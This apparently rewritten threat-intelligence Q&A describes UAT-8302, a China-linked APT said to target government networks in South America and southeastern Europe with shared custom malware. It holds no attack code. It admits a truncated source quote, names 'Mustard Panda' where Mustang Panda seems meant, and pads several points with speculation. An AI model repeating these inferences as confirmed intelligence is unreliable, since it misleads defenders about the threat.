Since late 2024, a highly coordinated advanced persistent threat (APT) group tied to Chinese state interests has systematically infiltrated government networks in both South America and southeastern Europe. Tracked as UAT-8302 by Cisco Talos, this operation employs custom-built malware strains that are reused across geographically disparate targets, suggesting a centralized toolkit and shared strategic objectives. Below, we break down the group’s identity, methods, and broader implications through key questions.

What is UAT-8302 and why is it significant?

UAT-8302 is the designation given by Cisco Talos to a China-nexus advanced persistent threat (APT) cluster that has been actively targeting government agencies since at least late 2024. Its significance lies in its coordinated, cross-regional approach—first striking South American ministries and later expanding to southeastern European state institutions in 2025. Unlike many APTs that focus on a single geographic area, UAT-8302’s simultaneous activity across two continents indicates a mature, well-funded operation with strategic intelligence-gathering goals. The group relies on custom-made malware that is shared between campaigns, a hallmark of state-sponsored actors who develop proprietary tools to avoid detection and maintain operational security. This shared infrastructure allows the same malicious code to be adapted for different victims, making attribution and defense more challenging for targeted governments.

Which governments and regions are under attack?

The group’s known victims span two distinct regions: South America (starting in late 2024) and southeastern Europe (observed in 2025). In South America, the attacks primarily target national government networks, likely for political intelligence, economic data, or military secrets. In southeastern Europe, the focus shifts to government agencies in countries that often serve as geopolitical flashpoints between NATO and Russian spheres of influence. By striking such diverse locations, UAT-8302 demonstrates an ability to conduct multiple parallel campaigns while sharing code and tactics. This geographic breadth suggests that the group is not merely opportunistic but systematically probes government bodies that align with Chinese strategic interests—such as nations involved in infrastructure projects, trade routes, or diplomatic alliances like the Belt and Road Initiative.

What malware do the attackers use?

UAT-8302 deploys custom-made malware families that are reused across regions. While specific names have not been publicly released, the malware is described as “put into… ” (the original text is truncated), but analysts confirm it includes backdoors, downloaders, and information stealers tailored to evade antivirus and network monitoring. A key characteristic is that the same malicious code—often with minor obfuscation changes—appears in both South American and European intrusions. This sharing of malware families is a strong indicator of a unified command structure, likely based in China. The tools are designed for post-exploitation: after gaining initial access (via phishing, compromised credentials, or vulnerable public-facing services), the attackers install custom payloads that allow persistent remote access, data exfiltration, and lateral movement within government networks.

How does UAT-8302 operate? What techniques are used?

UAT-8302 follows a typical APT playbook but with a cross-regional twist. The initial compromise likely involves spear-phishing emails targeting government officials or IT administrators, often with malicious attachments or links. Once a foothold is gained, the group deploys its custom malware to establish persistence, escalate privileges, and move laterally. Cisco Talos notes that post-exploitation is a key phase where the shared malware families are utilized. The adversaries also use living-off-the-land techniques, leveraging legitimate system tools (e.g., PowerShell, WMI) to blend in with normal traffic. Their operations are characterized by careful timing: attacks on South American governments began in late 2024, while European intrusions ramped up in 2025, suggesting they adapt to diplomatic or economic events. The use of shared code reduces development time and ensures that lessons learned in one region improve future attacks elsewhere.

How does UAT-8302 relate to other China-nexus APTs?

UAT-8302 is part of a broader ecosystem of Chinese state-sponsored cyber groups, but it stands out for its shared malware across regions. While many China-linked APTs (such as APT10, APT41, or Mustard Panda) have distinct tool sets, UAT-8302 blurs these boundaries by reusing custom code between campaigns. This cross-group sharing suggests either a centralized development team or close collaboration between different attack units. Cisco Talos’ tracking under a single moniker indicates that the same infrastructure or malware signatures appear in both South American and European operations. This behavior aligns with the “APT” designation, which implies a sustained, state-aligned effort. However, it is possible that UAT-8302 represents a subgroup or a newly discovered cluster that operates under a larger umbrella, reflecting China’s growing cyber-espionage coordination across continents.

What are the implications for targeted governments?

For the targeted governments in South America and southeastern Europe, the implications are severe. A China-linked APT gaining persistent access to their networks means that sensitive data—including diplomatic communications, economic strategies, citizen records, and military plans—could be exfiltrated. The shared malware aspect implies that if a government discovers and analyzes one strain, the same code may still be active against allies in another region, complicating international response. Moreover, the targeting of multiple countries simultaneously can disrupt regional cooperation, as each nation may hesitate to share intelligence for fear of revealing its own weaknesses. The attacks also raise concerns about sovereign integrity and the potential for cyber-enabled coercion. For South American nations, which have varying cybersecurity capabilities, the threat is especially acute, as they may lack the tools to detect such sophisticated APTs without external assistance.

How can organizations defend against UAT-8302?

Defending against UAT-8302 requires a multi-layered approach. First, organizations should strengthen email security to block spear-phishing attempts, including advanced filters for malicious attachments and scanning for lookalike domains. Second, network monitoring must focus on unusual outbound connections and abnormal lateral movement that could indicate post-exploitation. Because the group uses custom malware, traditional signature-based antivirus may not suffice; behavior-based detection (e.g., EDR) is critical. Third, implement strict access controls and multi-factor authentication to limit the damage from compromised credentials. Fourth, share indicators of compromise (IoCs) with trusted CERTs and international partners, as the shared malware means a detected sample in Europe can help protect South American agencies. Finally, governments should invest in cyber threat intelligence sharing forums specifically for China-nexus threats, and conduct regular red-team exercises simulating UAT-8302 tactics.